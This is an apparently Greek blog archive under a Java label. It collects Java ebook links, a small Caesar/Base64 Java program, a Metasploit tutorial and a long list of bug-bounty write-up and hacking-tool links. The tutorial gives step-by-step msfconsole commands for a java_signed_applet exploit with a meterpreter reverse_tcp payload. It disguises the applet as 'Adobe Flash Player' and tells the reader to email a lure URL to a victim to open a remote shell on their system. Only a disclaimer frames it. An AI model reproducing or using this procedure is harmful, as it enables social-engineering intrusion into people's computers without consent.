FoulsCode

Showing posts with label Java.

22 October 2017

Introduction to the JAVA programming language



The rapid spread of the Internet and the World-Wide Web created the need for new ways of developing and distributing software. These requirements led to the creation of the Java programming language by Sun Microsystems. Java was designed for developing applications that run in heterogeneous networked environments.

Edited by: NTUA (National Technical University of Athens)
Size: 105 pp. / 1 Mb
Format: PDF



https://mega.nz/#!0mJgRKSS!gDhqRpkTAZEp3b-riHlo_OjjdtkLPlNcEQuPxAuM-ss

20 October 2017

Java Notes (book)



Why JAVA?
1) Portable: the same code runs regardless of platform (as long as the corresponding Java compiler is installed) -> Internet
2) Object-oriented, but simpler than C++
3) Large library of classes (ready-made programs)
4) Uses elements of C

Author: Konstantinos P. Ferentinos
Year of publication: 2005
Size: 74 pp. / 581 Kb
Format: pdf




Code:
https://mega.nz/#!BmoQiKCQ!7xjeQuzDRRQjSP2aQ1MN2l8vN9HCA7K_G0SKTAAe54s

    12 July 2017

    Rate my code - LetterHeron (#Java)



    LetterHeron (I even gave it a name) takes a string and encrypts it with either a Caesarian Shift or Base64. In the future I may add other methods, but for now it is fine. The next projects will have networking as well.


    Many thanks to (TrevorC) for this code!


    Code:


    import java.nio.charset.StandardCharsets;
    import java.util.Base64;
    import java.util.Scanner;

    public class ltr
    {
        // One Scanner for the whole program: opening several Scanners on
        // System.in and closing any of them closes the underlying stream.
        private static final Scanner in = new Scanner(System.in);

        public static void main(String[] args)
        {
            System.out.println("Choose encryption method");
            System.out.println("");
            System.out.println("Type 1 for Caesar Cipher");
            System.out.println("");
            System.out.println("Type 2 for Base64");
            int encMethod = readInt();

            switch (encMethod)
            {
                case 1:
                    Caesar();
                    break;

                case 2:
                    Base64();
                    break;
            }
            in.close();
        }

        // Reads a whole line and parses it, so no stray newline is left
        // in the buffer for the next nextLine() call.
        private static int readInt()
        {
            return Integer.parseInt(in.nextLine().trim());
        }

        public static void Caesar()
        {
            System.out.println("Enter message:");
            String msg = in.nextLine();
            System.out.println("Enter encryption key:");
            String key = in.next();
            in.nextLine(); // discard the rest of the key line
            // The shift is the length of the key string, not its content.
            int keyLength = key.length();
            System.out.println("1. Encrypt, 2. Decrypt, 3.Exit");
            int option = readInt();

            switch (option)
            {
                case 1:
                    System.out.println("Encrypted message..." + encrypt(msg, keyLength));
                    break;

                case 2:
                    System.out.println("Decrypted message..." + decrypt(msg, keyLength));
                    break;

                case 3:
                    System.exit(0);
                    break;

                default:
                    System.out.println("Invalid input! Type 4 for help.");
                    break;
            }
        }

        // Shifts letters forward by keyLength % 26, wrapping inside the
        // alphabet; every other character is copied unchanged.
        public static String encrypt(String msg, int keyLength)
        {
            String encrypted = "";
            for (int i = 0; i < msg.length(); i++)
            {
                int c = msg.charAt(i);

                if (Character.isUpperCase(c))
                {
                    c = c + (keyLength % 26);

                    if (c > 'Z')
                        c = c - 26;
                }
                else if (Character.isLowerCase(c))
                {
                    c = c + (keyLength % 26);

                    if (c > 'z')
                        c = c - 26;
                }

                encrypted = encrypted + (char) c;
            }
            return encrypted;
        }

        // Inverse of encrypt(): shifts letters back by keyLength % 26.
        public static String decrypt(String msg, int keyLength)
        {
            String decrypted = "";
            for (int i = 0; i < msg.length(); i++)
            {
                int c = msg.charAt(i);

                if (Character.isUpperCase(c))
                {
                    c = c - (keyLength % 26);

                    if (c < 'A')
                        c = c + 26;
                }
                else if (Character.isLowerCase(c))
                {
                    c = c - (keyLength % 26);

                    if (c < 'a')
                        c = c + 26;
                }

                decrypted = decrypted + (char) c;
            }
            return decrypted;
        }

        // Base64 is an encoding, not encryption: it uses no key and
        // anyone can reverse it.
        public static void Base64()
        {
            System.out.println("Enter your message, with no spaces.");
            String msg = in.next();
            in.nextLine(); // discard the rest of the message line

            System.out.println("1. Encrypt, 2. Decrypt, 3.Exit");
            int pick = readInt();
            switch (pick)
            {
                case 1:
                    byte[] encode = Base64.getEncoder().encode(msg.getBytes(StandardCharsets.UTF_8));
                    System.out.println("The encoded message is: " + new String(encode, StandardCharsets.UTF_8));
                    break;

                case 2:
                    System.out.println("Please enter your message again");
                    String ms = in.nextLine().trim();
                    byte[] decode = Base64.getDecoder().decode(ms.getBytes(StandardCharsets.UTF_8));
                    System.out.println("Your message decoded is: " + new String(decode, StandardCharsets.UTF_8));
                    break; // was missing: case 2 fell through into System.exit(0)

                case 3:
                    System.exit(0);
                    break;
            }
        }
    }



    9 July 2017

    Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3

    In the tutorial that follows I will try to show you how we use the Social Engineering Tools to hit a victim. The process is simple, and its whole point rests on sending a URL to our victim so that, when they open the URL we send them, their system is exposed.

    Requirements:

    1. Metasploit Framework

    2. Operating System (I recommend Linux OS or Backtrack 5)

    Step by step:

    A) First of all we open a terminal and type:

    Terminal: msfconsole <-|


    Then we wait a little until it shows msf> and we type:


    use exploit/multi/browser/java_signed_applet <-| (we load the java_signed_applet exploit)

    set payload windows/meterpreter/reverse_tcp <-| (we set the reverse_tcp meterpreter so that we connect to the victim)


    B) The next step is to type some commands...


    Terminal: set appletname Adobe_Inc <-|
    set certcn Adobe Flash Player <-|

    set srvhost 192.168.8.92 <-| (the address of the server that the exploit sets up, i.e. our own address)

    set srvport 80 <-| (we choose port 80 because it is the appropriate one for this kind of attack through social engineering tools)

    set uripath videoplaylist <-| (the URL we send to our victim so that they are exposed when they open it --> http://192.168.8.92/videoplaylist)

    set lhost 192.168.8.92 <-| (our address)

    set lport 443 <-| (the port we use to connect to our victim)

    exploit <-| (exposure begins...)


    Next, we have to send our victim the address http://192.168.8.92/videoplaylist in some way, so that when they open it we gain access to their system. We can send it by e-mail, etc.

    When they open it, our terminal immediately starts running and tells us meterpreter session 1 opened..., their system has been opened, and the following prompt appears:


    Terminal: session -l <-| (to see the active sessions)

    Then it shows that we have one session in our list and I type again..

    session -i <-|


    Finally it shows meterpreter> on the screen, which means we are now inside their system.

    WARNING! This tutorial is provided for educational purposes only. I bear no responsibility if it is used maliciously or applied to third parties without their consent. Any illegal application of this guide is criminally prosecuted under the law.

    via: securitydnainfo.blogspot.gr



    31 December 2016

    Hacking Resources



    Disclosures

    Application Logic

    06/18/2013 - https://labs.spotify.com/2013/06/18/creative-usernames/ - Creative usernames and Spotify account hijacking
    06/26/2013 - Hijacking a Facebook Account with SMS - https://whitton.io/articles/hijacking-a-facebook-account-with-sms/
    03/25/2014 - Phabricator Bypass auth.email-domains - https://hackerone.com/reports/2233
    05/15/2016 - The Bank Job - https://boris.in/blog/2016/the-bank-job/
    05/19/2016 - InstaBrute: Two Ways to Brute-force Instagram Account Credentials - https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-i...
    06/06/2016 - Trello bug bounty: Payments informations are sent to the webhook - https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-...
    06/07/2016 - Pwning Pornhub (memcache) - https://blog.zsec.uk/pwning-pornhub/
    07/01/2016 - Magento – Re-Installation & Account Hijacking Vulnerabilities - http://netanelrub.in/2016/07/01/magento-re-installation-account-hijackin...
    08/08/2016 - Free way to Facebook Freebooting | Hacking Rights Manager - http://www.7xter.com/2016/08/free-way-to-facebook-freebooting.html
    08/16/2016 - Google Chrome, Firefox Address Bar Spoofing Vulnerability - http://www.rafayhackingarticles.net/2016/08/google-chrome-firefox-addres...
    08/18/2016 - How I hacked an Android App to Get Free Beer - https://breakdev.org/how-i-hacked-an-android-app-to-get-free-beer/
    09/02/2016 - Response To Request Injection (RTRI) - https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZ...

    Authentication

    04/27/2016 - Microsoft Office 365 SAML Bypass - http://www.economyofmechanism.com/office365-authbypass.html
    04/28/2016 - Slack bot token leakage exposing business critical information - https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-b...
    06/01/2016 - Taking over Heroku accounts - http://esevece.github.io/2016/06/01/taking-over-heroku-accounts.html
    10/20/2016 - Slack, a Brief Journey to Mission Control - http://secalert.net/slack-security-bug-bounty.html
    11/02/2016 - Bypassing Two-Factor Authentication on OWA & Office365 Portals - http://www.blackhillsinfosec.com/?p=5396

    CORS/CSP

    04/04/2016 - CSP: bypassing form-action with reflected XSS - https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-ref...
    12/16/2016 - Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin...

    CSRF

    05/17/2016 - How I bypassed Facebook CSRF in 2016 - http://pouyadarabi.blogspot.ca/2016/05/how-i-bypassed-facebook-csrf-in-2...
    19/07/2016 - Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-pic...
    26/10/2016 - Google Spreadsheet Vuln - CSRF and JSON Hijacking allows data theft - https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hija...

    CSV Injection

    29/01/2013 - Cell Injection: Attacking the End User Through the Application - http://blog.7elements.co.uk/2013/01/cell-injection.html
    04/17/2016 - CSV Injection in business.uber.com - http://blog.daviddworken.com/posts/csv-injection-in-businessubercom/

    HPP

    08/23/2015 - Twitter HPP vulnerability unsubscribing from emails - http://www.merttasci.com/blog/twitter-hpp-vulnerability/
    12/03/2015 - Parameter Tampering Attack on Twitter Web Intents - https://ericrafaloff.com/parameter-tampering-attack-on-twitter-web-intents/
    02/02/2016 - Bypassing Digits web authentication's host validation with HPP - https://hackerone.com/reports/114169

    Host Header Injection

    09/06/2016 - Internet Explorer has a URL Problem - http://blog.innerht.ml/internet-explorer-has-a-url-problem/
    10/24/2016 - Combining Host Header Injection and Lax Host Parsing Service Malicious Data - https://labs.detectify.com/2016/10/24/combining-host-header-injection-an...

    IDOR

    06/23/2016 - UBER HACKING: HOW WE FOUND OUT WHO YOU ARE, WHERE YOU ARE AND WHERE YOU WENT! - https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you...
    06/23/2016 - Facebook's Bug - Delete any video from Facebook - http://www.pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-...
    08/25/2016 - How I Could Have Hacked Multiple Facebook Accounts - https://medium.com/@gurkiratsingh/how-i-could-have-hacked-multiple-faceb...
    11/22/2016 - You get a UUID! You get a UUID! Everybody gets a UUID! - http://www.rohk.xyz/uber-uuid/

    Information Disclosure

    12/21/2016 - Disclosing the primary email address for each Facebook user - http://www.dawgyg.com/2016/12/21/disclosing-the-primary-email-address-fo...

    SSRF

    04/18/2016 - ESEA Server-Side Request Forgery and Querying AWS Meta Data - http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-queryin...
    02/23/2016 - FFMPEG File Disclosure - https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/web/sup...
    Trello Bug Bounty Access Server Files Using Imagetragick - https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetr...

    SSTI

    04/25/2016 - Adapting AngularJS Payloads to Exploit Real World Applications - http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-explo...

    Reverse Engineering

    04/19/2016 - Digging into a Facebook Worm - https://gist.githubusercontent.com/phwd/0ec21c6289543f35135e17aa11f7dec1...
    07/01/2016 - How I Cracked a Keylogger and Ended Up in Someone's Inbox - https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keyl...
    11/14/2016 - Hacking Team Back For Your Androids - http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/

    Relative Path Overwrite

    03/21/2014 - Relative vs Absolute - http://www.thespanner.co.uk/2014/03/21/rpo/
    02/17/2015 - Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities - http://blog.portswigger.net/2015/02/prssi.html
    07/03/2016 - RPO Gadgets - http://blog.innerht.ml/rpo-gadgets/

    XSS

    07/06/2010 - Facebook XSS via Cross-Origin Resource Sharing - http://maustin.net/2010/07/06/facebook_html5.html
    02/14/2013 - How I got the Bug Bounty for Mega.co.nz XSS - https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-...
    04/22/2015 - XSS via Host header - www.google.com/cse - http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
    12/08/2015 - Creative bug which result Stored XSS on m.youtube.com - http://sasi2103.blogspot.ca/2015/12/creative-bug-which-result-stored-xss...
    04/17/2016 - XSS in pypi (and Uber!) - http://blog.daviddworken.com/posts/xss-in-pypi-and-uber/
    04/17/2016 - XSS in getrush.uber.com - http://blog.daviddworken.com/posts/xss-in-getrushubercom/
    04/19/2016 - Using a Braun Shaver to Bypass XSS Audit and WAF - https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-...
    05/09/2016 - XSS and RCE, domain takeover with remote loaded JS - http://brutelogic.com.br/blog/xss-and-rce/
    06/13/2016 - Embedding XSS in SVG files - http://bini.tech/wordpress-remote-upload-unrestricted-file-upload/
    07/02/2016 - OneDrive: an easter egg into MS library - XSS on Microsoft and not only - https://luc10.github.io/onedrive-an-easter-egg-into-ms-library/
    07/04/2016 - Apple and the 5 XSSes - http://strukt93.blogspot.ca/2016/07/apple-and-5-xsses.html
    07/19/2016 - Instagram Reflected XSS in Link Shim - http://ameeras.me/Instagram-Reflected-XSS-in-Link-Shim/
    07/19/2016 - Blind XSS in Spotify - https://mhmdiaa.github.io/jekyll/update/2016/07/19/blind-xss-in-spotify....
    07/22/2016 - United to XSS United - http://strukt93.blogspot.ca/2016/07/united-to-xss-united.html
    08/29/2016 - Turning Self-XSS into Good XSS v2: Challenge Completed but Not Rewarded - https://httpsonly.blogspot.ca/2016/08/turning-self-xss-into-good-xss-v2....
    08/31/2016 - Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter - https://thehackerblog.com/breaching-a-ca-blind-cross-site-scripting-bxss...
    09/19/2016 - Combination of techniques lead to DOM Based XSS in Google - http://sasi2103.blogspot.ca/2016/09/combination-of-techniques-lead-to-do...
    12/07/2016 - Stored XSS Affecting All Fantasy Sports on Yahoo - http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fan...

    XXE

    06/25/2014 - Identifying Xml eXternal Entity vulnerability (XXE) in GPX files - http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
    03/21/2015 - XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250] - https://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library...
    08/14/2015 - XXE ALL THE THINGS!!! (INCLUDING APPLE IOS’S OFFICE VIEWER) - https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-io...

    CRLF

    03/15/2015 - Parse.com - X-Forwarded-Host Injection - Bypass secure & HTTP_only Vulnerability - https://www.youtube.com/watch?v=1yUw7rtTTeI

    Remote Code Execution

    12/09/2013 - Remote Code Execution exploit in WordPress 3.5.1 - https://tom.vg/2013/12/wordpress-rce-exploit/
    02/15/2015 - RCE in Oracle NetBeans Opensource Plugins: PrimeFaces 5.x Expression Language Injection - http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource...
    11/06/2015 - Java unserialization - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss...
    11/12/2015 - XSS to Remote Code Execution with HipChat - http://maustin.net/2015/11/12/hipchat_rce.html
    05/04/2016 - Remote Code Execution via ImageMagick - http://pastebin.com/aE4sKnCg (file)
    05/10/2016 - Exploiting ImageMagick on Polyvore (Yahoo) - http://nahamsec.com/exploiting-imagemagick-on-yahoo/
    07/22/2016 - Exploiting Java Deserialization via JBoss - https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserializati...
    07/25/2016 - CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability - http://www.korpritzombie.com/cve-2016-5840-trend-micro-deep-discovery-ho...
    08/15/2016 - Jetbrains IDE Remote Code Execution and Local File Disclosure - http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-e...
    08/24/2016 - The Million Dollar Dissident - https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-...
    09/21/2016 - pwn them for learn - http://bugdisclose.blogspot.ca/2016/09/pwn-them-for-learn.html
    10/26/2016 - Details on the Privilege Escalation Vulnerability in Joomla - https://blog.sucuri.net/2016/10/details-on-the-privilege-escalation-vuln...

    Memory Related

    5/13/2016 - 7-Zip vulnerabilities found by Talos - http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html

    Source Code Disclosure

    03/27/2016 - A tale of an interesting source code leak - http://secalert.net/#scl-soh
    07/19/2016 - Accessing PornHub's SVN repo - https://hackerone.com/reports/72243
    07/22/2016 - Twitter's Vine Source code dump - https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/
    10/14/2016 - Importance of up-to-date application usage plus complex password OR from directory traversal to admin panel takeover - http://zuh4n.blogspot.ca/

    SQLi

    12/20/2016 - Flickr from SQLi to RCE - https://pwnrules.com/flickr-from-sql-injection-to-rce/
    07/25/2016 - SQL Injection on sctrack.email.uber.com.cn - https://hackerone.com/reports/150156

    Subdomain Takeover

    10/21/14 - Hostile Subdomain Takeover using Heroku/Github/Desk + more - https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-h...
    12/08/14 - Hijacking of abandoned subdomains part 2 - https://labs.detectify.com/2014/12/08/hijacking-of-abandoned-subdomains-...
    07/26/16 - Uber Subdomain Takeover - http://blog.eseccyber.tech/article/uber.html
    09/05/2016 - How I was able to read Uber logs and internal emails - http://blog.pentestnepal.tech/post/149985438982/how-i-was-able-to-read-u...

    HTML Injection

    07/26/2016 - Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection - https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-...

    OAuth

    02/07/2014 - How I Hacked GitHub Again. - http://homakov.blogspot.ca/2014/02/how-i-hacked-github-again.html
    07/20/2015 - Bypassing Google Authentication on Periscope's Administration Panel - https://whitton.io/articles/bypassing-google-authentication-on-periscope...
    01/04/2016 - Bypassing callback_url validation on Digits - https://hackerone.com/reports/108113
    02/29/2016 - Swiping Facebook Official Access Tokens - http://philippeharewood.com/swiping-facebook-official-access-tokens/
    04/03/2016 - Obtaining Login Tokens for Outlook, Office or Azure (OAuth) - https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/
    06/16/2016 - Bypass Disabled Client OAuth Login in Facebook Pages Manager App - http://philippeharewood.com/bypass-disabled-client-oauth-login-in-facebo...
    10/13/2016 - CVE-2016-4977: RCE in Spring Security OAuth - http://secalert.net/#CVE-2016-4977

    Mobile

    04/12/2015 - Shopify android client all API request's response leakage - https://hackerone.com/reports/56002
    07/26/2016 - Odnoklassniki Android application vulnerabilities - https://hackerone.com/reports/97295

    Browser

    12/06/16 - Firefox - SVG cross domain cookie vulnerability - https://insert-script.blogspot.ca/2016/12/firefox-svg-cross-domain-cooki...


    CTF Writeups

    03/03/2013 - Unauthorized Access: Bypassing PHP strcmp() - http://danuxx.blogspot.ca/2013/03/unauthorized-access-bypassing-php-strc...
    06/09/2016 - Hack in the Box 2016 – MISC400 Writeup (Part 1) - http://rileykidd.com/2016/06/09/hack-in-the-box-2016-misc400-writeup-par...
    10/03/2016 - Hacking the Hard Way at the Derbycon CTF - https://labs.signalsciences.com/hacking-the-hard-way-at-the-derbycon-ctf...
    BSides Ottawa CTF - Second Place! - https://blog.fletchto99.com/2016/october/bsides-ottawa/
    2016 Hack the Vote - https://github.com/ctfs/write-ups-2016/tree/master/hack-the-vote-ctf-2016

    Resources

    XXE Payloads in iOS - http://en.hackdig.com/08/28075.htm
    Burp Tutorials - https://vimeo.com/album/3510171
    Facebook CTF - https://github.com/facebook/fbctf
    SSRF Bible - https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa...
    Jerry Gamblin Hacking Blog - http://jerrygamblin.com/category/hacking
    Filedescriptor XSS Polyglots - http://polyglot.innerht.ml/
    prompt.ml XSS Challenge - https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#hidden-level--1
    Hacking with Unicode - https://speakerdeck.com/mathiasbynens/hacking-with-unicode-in-2016
    Programming Practice (paid premium) - https://coderbyte.com/
    Online CTF Practice challenges - https://backdoor.sdslabs.co
    Nicolas Grégoire Burp Pro Tips - http://www.agarri.fr/docs/HiP2k13-Burp_Pro_Tips_and_Tricks.pdf
    Open Security Training - http://opensecuritytraining.info/
    OWASP Mutillidae II Web Pen-Test Practice Application - https://sourceforge.net/projects/mutillidae/
    DNS - https://haxpo.nl/haxpo2015ams/wp-content/uploads/sites/4/2015/04/D1-P.-M...
    XSS without HTML: Client-Side Template Injection with AngularJS - http://blog.portswigger.net/2016/01/xss-without-html-client-side-templat...
    File Upload XSS - http://brutelogic.com.br/blog/file-upload-xss/
    CSV Injection Mitigations - https://blog.zsec.uk/csv-dangers-mitigations/
    Comma Separated Vulnerabilities - http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
    Running your own anonymous rotating proxies - http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
    Reviewing bug bounties - a hacker's perspective - http://www.skeletonscribe.net/2016/08/reviewing-bug-bounties-hackers.html
    Practical HTTP Host Header Attacks - http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks...
    Practice CTF List / Permanent CTF List - https://captf.com/practice-ctf/
    lcamtuf's blog - https://lcamtuf.blogspot.ca/
    Backup File Artifacts - http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
    Unicode Character 'PILE OF POO' - http://www.fileformat.info/info/unicode/char/1F4A9/index.htm
    Decompile and Recompile Android APK - https://blog.bramp.net/post/2015/08/01/decompile-and-recompile-android-apk/
    Frans Rosen - Time Based Captcha Protected SQLi - http://www.slideshare.net/fransrosen/time-based-captcha-protected-sql-in...
    CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy - https://research.google.com/pubs/pub45542.html
    How to View TLS Traffic in Android’s Logs - https://blog.securityevaluators.com/how-to-view-tls-traffic-in-androids-...
    https://url.spec.whatwg.org/
    AngularJS Sandbox Escapes Explained - https://www.reddit.com/r/angularjs/comments/557bhr/xss_in_angularjs_vide...
    Senate Republicans were skimmed for six months, quietly fix store - https://gwillem.github.io/2016/10/04/how-republicans-send-your-credit-ca...
    Introduction to OSINT: Recon-ng Tutorial - https://strikersecurity.com/blog/getting-started-recon-ng-tutorial/
    Exploiting CORS misconfigurations - http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-fo...
    Abusing Dorking and Robots.txt - http://sten0.ghost.io/2016/10/13/abusing-dorking-and-robots-txt/
    Brute Logic XSS Challenge I - http://brutelogic.com.br/blog/xss-challenge-i/
    How Google and Bing Protect their APIs - https://rudk.ws/2016/10/23/how-google-and-bing-protects-their-api/
    Free Dev Books - https://devfreebooks.github.io/
    IOS Application Security Review Methodology - http://research.aurainfosec.io/ios-application-security-review-methodology/
    Anatomy of a Subtle JSON Vulnerability - http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerabi...
    Finding XSS Slidedeck - http://slides.com/mscasharjaved/deck-13#/
    XSS Polyglots - https://blog.bugcrowd.com/xss-polyglots-the-context-contest?utm_campaign...
    Bypassing Saml 2.0 SSO - http://research.aurainfosec.io/bypassing-saml20-SSO/
    Bypassing CSP using polyglot jpegs - http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html
    Facebook Graphql Crash Course - https://www.facebook.com/notes/phwd/a-facebook-graphql-crash-course/1189...
    New XSSI Vector Untold Merits of nosniff - https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff

    Research papers

    Minded Security Expression Language Injection Paper - https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
    Sandboxing JavaScript in the Browser - https://var.thejh.net/thesis_excerpt.pdf
    Does The Online Card Payment Landscape Unwittingly Facilitate Fraud? - http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-...

    Online Courses / Training

    Cyber Security Base with F-Secure is a free course series by University of Helsinki - https://cybersecuritybase.github.io/
    Vulnerable Web Applications for Learning - https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applica...
    James Kettle's hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl#demo
    Google XSS Game - https://xss-game.appspot.com/
    Google DOM Based XSS - https://public-firing-range.appspot.com/address/index.html
    Code Lab: Web Application Exploits and Defenses - https://google-gruyere.appspot.com/

    Cheat Sheets

    Path Traversal Cheat Sheet Linux - https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux/
    XXE - https://www.gracefulsecurity.com/xxe-cheatsheet/
    HTML5 Security Cheat Sheet - https://html5sec.org/
    Brute XSS Cheat Sheet - http://brutelogic.com.br/blog/cheat-sheet/
    MySQL SQL Injection Cheat Sheet - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-c...
    AngularJS Sandbox Bypass Collection (includes 1.5.7) - http://pastebin.com/xMXwsm0N
    Java Deserialization - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    Penetration testing tools cheat sheet - https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
    OAuth - https://github.com/homakov/oauthsecurity

    Burp How Tos

    http://security-geek.in/2014/08/22/using-burp-suite-to-brute-force-http-...

    Tools

    Discovery
    https://github.com/OJ/gobuster
    Sublist3r is a Python tool that is designed to enumerate subdomains of websites using search engines - https://github.com/aboul3la/Sublist3r
    EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible - https://github.com/ChrisTruncer/EyeWitness
    Smart content discovery burp plugin with context awareness - https://github.com/pathetiq/BurpSmartBuster
    An automated tool that checks for backup artifacts that may disclose the web-application's source code - https://github.com/mazen160/bfac

    Recon-ng
    Recon-ng + Google Dorks + Burp = ... - https://averagesecurityguy.github.io/2016/10/21/recon-ng-dorks-burp/

    Port Scanning
    Resolve and quickly portscan a list of (sub)domains - https://github.com/melvinsh/subresolve

    Mobile
    JD-GUI, a standalone graphical utility that displays Java sources from CLASS files. - https://github.com/java-decompiler/jd-gui
    Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static, dynamic analysis and web API testing - https://github.com/ajinabraham/Mobile-Security-Framework-MobSF
    An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning - https://github.com/Fuzion24/JustTrustMe
    Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps - https://github.com/nabla-c0d3/ssl-kill-switch2
    Android APK Tool - https://ibotpeaches.github.io/Apktool/
    Android Dex2Jar - https://github.com/pxb1988/dex2jar

    Decompiler
    JPEXS Free Flash Decompiler - https://github.com/jindrapetrik/jpexs-decompiler
    Flashbang, find the flashVars of a naked SWF and display them - https://github.com/cure53/Flashbang

    Java Deserialization
    A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization - https://github.com/frohoff/ysoserial

    Password Cracking
    John the Ripper - http://www.openwall.com/john/

    Hash Cracking
    Online Hash Crack - http://www.onlinehashcrack.com/
    CyberChef - https://gchq.github.io/CyberChef/

    Vulnerability SaaS
    SSRF Detector - https://ssrfdetector.com/
    XSSHunter - https://xsshunter.com



    via: www.torontowebsitedeveloper.com